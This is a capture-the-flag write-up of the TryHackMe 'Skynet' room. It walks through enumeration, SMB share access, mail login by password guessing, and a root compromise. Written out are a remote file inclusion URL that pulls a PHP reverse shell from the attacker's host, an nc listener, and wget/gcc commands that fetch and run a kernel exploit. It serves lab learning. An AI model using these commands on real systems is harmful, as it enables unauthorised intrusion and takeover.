skynet
General
This is a writeup of the room https://tryhackme.com/room/skynet.
Writeup
First thing I did was a nmap scan,
nmap -sV -oN nmap.out <ip>which proposed an Apache httpd 2.4.18 webserver on port 80 and Samba smbd 3.X - 4.X on port 139 and 445.
Accessing the website did not give much and my next step was to enumerate for other pages,
gobuster dir -u <ip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtyielding the noteworthy page http://<ip>/squirrelmail where a login page resides. The exploit I could find on this service required us to be authenticated, hence I continued to enumerate.
Listing folders shared via SMB gave away noteworthy shares like anonymous and milesdyson. Access to milesdyson was denied, but anonymous was not.
smbclient --no-pass -L //<ip>
smbclient --no-pass //<ip>/anonymousThis gave away a file, attention.txt and a folder logs with files log1.txt, log2.txt and log3.txt, where the first one had wordlist-like content.
Now, the question to answer is "What is Miles password for his emails?", hence I tried the username milesdyson together with words from the wordlist, which was successful.
Inside the mail portal, a mail regarding smb password change resides, revealing a password.
Using this password, access to the milesdyson share is now granted.
smbclient -U milesdyson //<ip>/milesdysonHaving a look around reveals a notes folder, where a file, important.txt, can be found inside. This file indicates a hidden directory /45kra..., allowing us to answer the question "What is the hidden directory?".
Accessing http://<ip>/45kra... presents us with Miles Dyson Personal Page, which seems useless at first. Enumerating this for subpages,
gobuster dir -u <ip>/45kra... -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtyields a http://<ip>/45kra.../administrator page, where a CMS login page is found.
Having a quick look at exploit-db on this service instantly reveals what vulnerability it suffers from, providing the answer to the question "What is the vulnerability called when you can include a remote file for malicious purposes?", if the question it self did not give it away already.
Next step was to try and get a reverse shell by exploiting this vulnerability.
First, fiddling around with the URL provided in the exploit to ensure this vulnerability indeed was exploitable.
Second, setup a listener:
nc -lvnp <port>Third, prepare a reverse shell by setting the correct ip and port of the attacker machine and listener. I prefer to use this one https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php.
Fourth, make this file available to the target machine, e.g., by hosting it on a webserver:
python3 -m http.serverLast, connect to the webserver from the target machine providing the correct URL in order to receive a reverse shell on the listener.
http://<ip>/45kra.../administrator/alerts/alertConfigField.php?urlConfig=http://<webserver_ip>:<port>/php-reverse-shell.phpHaving a reverse shell, obtain the user flag to answer "What is the user flag?".
cd /home/milesdyson
cat user.txtMy way to root was to obtain system information and use the kernel exploit, https://www.exploit-db.com/exploits/43418.
uname -aMoreover, wget and gcc were on the target machine, which allowed me to download and compile the exploit as well. I used the following method.
First, download the exploit on the attacking machine.
Second, setup a webserver in the folder it was saved to, as wget was not possible directly from the target machine due to no internet access.
Last, transfer exploit from attacking machine to target machine. I used /tmp as my working folder on the target machine as this tend to be writeable. Compile and execute.
cd /tmp
wget http://<attacking_ip>:<port>/pwn.c
gcc pwn.c -o pwn
./pwnCongrats on root. The question "What is the root flag?" should now be an easy one.
Last updated